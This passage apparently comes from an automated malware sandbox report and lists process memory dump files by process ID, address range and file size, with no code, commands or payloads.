                                                                                                                • memory/1304-318-0x00000198F1F00000-0x00000198F1F70000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/1304-149-0x00000198F1D20000-0x00000198F1D90000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/1304-125-0x00000198F19A0000-0x00000198F19A2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/1396-321-0x000001F839620000-0x000001F839690000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/1396-144-0x000001F8395B0000-0x000001F839620000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/1408-162-0x000001B0F0AA0000-0x000001B0F0B10000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/1676-355-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1800-219-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1800-238-0x0000000003015000-0x0000000003017000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/1800-236-0x0000000003012000-0x0000000003014000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/1800-237-0x0000000003014000-0x0000000003015000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/1800-227-0x0000000003010000-0x0000000003012000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/1868-150-0x0000022DD8260000-0x0000022DD82D0000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/1924-279-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2052-214-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2052-226-0x00000000024A0000-0x00000000024A2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/2100-250-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2164-208-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  88KB

                                                                                                                • memory/2164-206-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2208-187-0x0000000001370000-0x0000000001371000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2208-190-0x0000000002F40000-0x0000000002F42000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/2208-189-0x00000000013A0000-0x00000000013A1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2208-188-0x0000000001380000-0x000000000139C000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  112KB

                                                                                                                • memory/2208-182-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2208-185-0x0000000000D70000-0x0000000000D71000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2228-205-0x0000025975700000-0x00000259757FF000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  1020KB

                                                                                                                • memory/2228-161-0x0000025973200000-0x0000025973270000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/2228-126-0x00007FF709C04060-mapping.dmp
                                                                                                                • memory/2260-222-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2260-228-0x0000000002EE0000-0x0000000002EE2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/2260-235-0x0000000002EE2000-0x0000000002EE4000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/2260-239-0x0000000002EE5000-0x0000000002EE6000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2296-369-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2304-368-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2400-176-0x000002B85DC80000-0x000002B85DCF0000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/2400-307-0x000002B85D8B0000-0x000002B85D8FB000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  300KB

                                                                                                                • memory/2400-308-0x000002B85E240000-0x000002B85E2B0000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/2420-173-0x00000180CA120000-0x00000180CA190000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/2688-200-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2688-203-0x0000000002220000-0x0000000002222000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/2712-160-0x000001D700370000-0x000001D7003E0000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/2720-174-0x000002426F220000-0x000002426F290000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/2728-168-0x0000019964560000-0x00000199645D0000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/2772-268-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3356-193-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  172KB

                                                                                                                • memory/3356-191-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3400-366-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3700-350-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4144-229-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4144-232-0x0000000001500000-0x000000000150D000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  52KB

                                                                                                                • memory/4144-257-0x0000000000400000-0x0000000000448000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  288KB

                                                                                                                • memory/4192-277-0x0000000000401480-mapping.dmp
                                                                                                                • memory/4192-281-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  284KB

                                                                                                                • memory/4192-274-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  284KB

                                                                                                                • memory/4340-273-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4356-256-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4388-362-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4496-359-0x0000000000402F68-mapping.dmp
                                                                                                                • memory/4652-283-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4708-267-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  3.5MB

                                                                                                                • memory/4708-241-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4708-260-0x00000001401FBC30-mapping.dmp
                                                                                                                • memory/4708-259-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  3.5MB

                                                                                                                • memory/4796-261-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4828-262-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4836-332-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4892-357-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4904-242-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4904-245-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/4904-246-0x00000000005D0000-0x00000000005E2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  72KB

                                                                                                                • memory/4924-358-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4932-258-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5056-352-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5060-247-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5060-280-0x00000000020A0000-0x00000000020E4000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  272KB

                                                                                                                • memory/5144-331-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5164-288-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5192-360-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5220-291-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5304-354-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5316-351-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5376-294-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5440-297-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5440-309-0x0000000002C80000-0x0000000002CDC000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  368KB

                                                                                                                • memory/5440-305-0x000000000452F000-0x0000000004630000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  1.0MB

                                                                                                                • memory/5524-333-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5524-338-0x0000000000AA1000-0x0000000000AA5000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  16KB

                                                                                                                • memory/5584-363-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5688-312-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5712-356-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5728-344-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5780-349-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5796-367-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5828-346-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5852-345-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5920-365-0x0000000000000000-mapping.dmp
                                                                                                                • memory/6016-347-0x0000000000000000-mapping.dmp
                                                                                                                • memory/6036-348-0x0000000000000000-mapping.dmp
                                                                                                                • memory/6052-327-0x0000000000000000-mapping.dmp